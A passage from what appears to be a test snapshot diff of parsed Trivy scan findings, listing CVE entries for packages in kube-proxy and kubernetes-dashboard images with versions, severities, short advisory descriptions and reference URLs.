"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "https://ubuntu.com/security/notices/USN-5352-1", + "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + ], + }, + "category": "Vulnerability", + "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "http://www.securityfocus.com/bid/105151", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://gitlab.com/gnutls/libtasn1/issues/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://ubuntu.com/security/notices/USN-5352-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "request smuggling", + "name": "privilege escalation via the less pager", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.debian.org/security/2021/dsa-4942", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 